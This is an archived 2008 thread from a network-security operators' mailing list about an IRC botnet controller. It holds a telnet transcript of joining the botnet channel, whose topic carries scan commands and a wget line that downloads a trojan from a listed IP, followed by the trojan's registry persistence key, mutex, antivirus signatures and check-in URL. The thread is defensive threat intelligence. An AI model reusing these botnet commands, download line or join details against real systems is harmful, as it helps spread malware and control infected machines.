[nsp-sec] ACK3356 - Re: history on irc.intelligence-tech.com

David Rossbach david at rossbachs.com
Tue Feb 26 14:39:43 EST 2008 

Thanks Stephen and Jason for the additional information on this botnet.... I 
have contacted our customer and they are investigating and will clean this 
up!

Dave Rossbach
AS3356
Level3 Communications



----- Original Message ----- 
From: "Stephen Gill" <gillsr at cymru.com>
To: "Jason Chambers" <jchambers at ucla.edu>; "nsp-security NSP" 
<nsp-security at puck.nether.net>
Sent: Monday, February 25, 2008 3:25 PM
Subject: Re: [nsp-sec] history on irc.intelligence-tech.com


> ----------- nsp-security Confidential --------
>
> # telnet irc.intelligence-tech.com 21958
> Trying 8.14.145.68...
> Connected to irc.intelligence-tech.com.
> Escape character is '^]'.
> NICK b
> USER b b b :b
> :IntTech 001 a :MySQL  <...>
> :IntTech 376 a :
> :a MODE a :+i
> JOIN #hobo nutsack
> :<...> JOIN :#hobo
> :IntTech 332 a #hobo :.asc -S -s|.else status scan .asc asn 50 5 0 _b _r
> _h|.if nick *USA* .wkse 50 5 0 _b _r _h|.else nick *USA* .wkso 50 5 0 _b 
> _r
> _h|.r.wget http://8.14.145.115/~inttech/mstskmgr.exe c:\mstskmgr.exe h
> :IntTech 333 a #hobo 10:30 PM 1200102639
> :IntTech 366 a #hobo :End of /NAMES list.
>
> Brief history on that file:
>
> 2008-01-08 12:50:01     mstskmgr.exe.aug3.0017
> 2007-01-04 00:51:05     http://www.naturalgardening.net/mstskmgr.exe
> 2007-02-01 11:01:13     129517.mstskmgr.exe
> 2007-02-10 07:42:52     730a87979a5aa825c5b5f547e1e7d014.exe
> 2007-02-14 13:46:04     mstskmgr.exe
> 2007-02-26 13:31:08     mstskmgr.exe
> 2007-04-02 18:01:02     none
> 2007-06-06 21:23:48     4f1582d388f19cfab7042f97e94170bcfcd4913c
> 2007-07-12 21:31:15     mstskmgr.exe
> 2007-07-15 02:16:08     730a87979a5aa825c5b5f547e1e7d014.EX$
> 2007-07-24 04:11:52     730a87979a5aa825c5b5f547e1e7d014.EX$
> 2007-07-29 04:36:17     http://www.intelligence-tech.com/mstskmgr.exe
> 2007-08-22 11:41:32     http://www.intelligence-tech.com/mstskmgr.exe
> 2007-11-06 02:37:17     http://8.14.145.115/~inttech/mstskmgr.exe
> 2006-11-18 20:16:04     mstskmgr.exe
>
> dnsrr      count      dnsrr first seen
> www.intelligence-tech.com     8     2007-01-09 12:39:43
> www.int-tech.info     7     2007-01-09 12:39:43
>
> Adds:
>
> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "MS Task
> Manager 32" = C:\WINDOWS\System32\mstskmgr.exe
>
> Mutex:
>
> MSTSKMGR32
>
> Since it has been around the block AV rate is pretty good:
>
> AV engine      Country      Signature
> Ahnlab     KR     Win-Trojan/Ranky.20480.F
> Aladdin (esafe)     IL     Win32.Ranky.de
> Alwil (avast)     CZ     Win32:Ranky-ED [Trj]
> Arcabit (arcavir)     PL     Trojan.Proxy.Ranky.De
> Authentium     US     W32/Proxy.gen1
> Avira (antivir)     DE     TR/Crypt.ULPM.Gen
> BitDefender     RO     Trojan.Proxy.Ranky.E
> CA (E-Trust Vet)     US     Win32/Ranck!generic
> CAT (quickheal)     IN     TrojanProxy.Ranky.de
> Central Command (vexira)     US     Trojan.PR.Ranky.FP
> ClamAV         no_virus
> CPsecure     US     no_virus
> Cybersoft (vfind)     US     no_virus
> Dr. Web     RU     Trojan.Proxy.1707
> Eset (nod32)     US     Win32/TrojanProxy.Ranky
> Fortinet     US     W32/Ranky.DE!tr
> Frisk (f-prot)     IS     W32/Proxy.gen1
> F-Secure     FI     Trojan-Proxy.Win32.Ranky.de
> Grisoft (avg)     CZ     Proxy.IAX
> Hauri (virobot)     KR     no_virus
> Ikarus     AT     Trojan-Proxy.Win32.Ranky.DE
> Kaspersky     RU     Trojan-Proxy.Win32.Ranky.de
> Mcafee     US     Proxy-FBSR.gen
> MicroWorld (escan)     IN     Trojan-Proxy.Win32.Ranky.de
> Norman     NO     W32/Rank.AHV
> Panda     ES     Trj/Ranky.QL
> Rising     CN     Trojan.Proxy.Ranky.ayw
> Securecomputing (webwasher)     US     Trojan.Crypt.ULPM.Gen
> Sophos     GB     Troj/Ranky-AU
> Symantec     US     Backdoor.Ranky
> TheHacker     PE     Trojan/Proxy.Ranky.de
> Trend Micro     JP     TROJ_RANKY.NF
> VirusBlokAda (vba32)     BY     Trojan-Proxy.Win32.Ranky.de
> VirusBuster     HU     Trojan.PR.Ranky.FP
>
> Proxy checks in to:
>
> http://www.int-tech.info/main.php?p=21164 -> the port it chose to listen 
> to
>
> Cheers,
> Steve, Team Cymru.
>
> On 2/25/08 1:41 PM, "Jason Chambers" <jchambers at ucla.edu> wrote:
>
>> ----------- nsp-security Confidential --------
>>
>> Hello all,
>>
>> I've noticed in our recent infections that 8.14.145.68 is involved with
>> a few.  Looking back at some past data, I see this botnet as far back as
>> 2007-03-04.
>>
>> Anyone have any more information on this one ?
>>
>> 3356  | LEVEL3 Level 3 Communications  | 8.14.145.68     | tcp  | 25394
>> | 2008-02-03 10:22:45 | 2008-02-11 10:22:45 | bot | 0 | 0 | ID: Int
>> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958
>>
>> 3356  | LEVEL3 Level 3 Communications  | 8.14.145.68     | tcp  | 25394
>> | 2007-03-04 09:49:52 | 2007-03-12 09:49:52 | bot | 0 | 0 | ID: Int
>> Tech DNSRR: irc.intelligence-tech.com PORTS: 21958_6667
>>
>>
>> Thanks,
>
> -- 
> Stephen Gill, Chief Scientist, Team Cymru
> http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security 
> counter-measures.
> _______________________________________________
>

More information about the nsp-security mailing list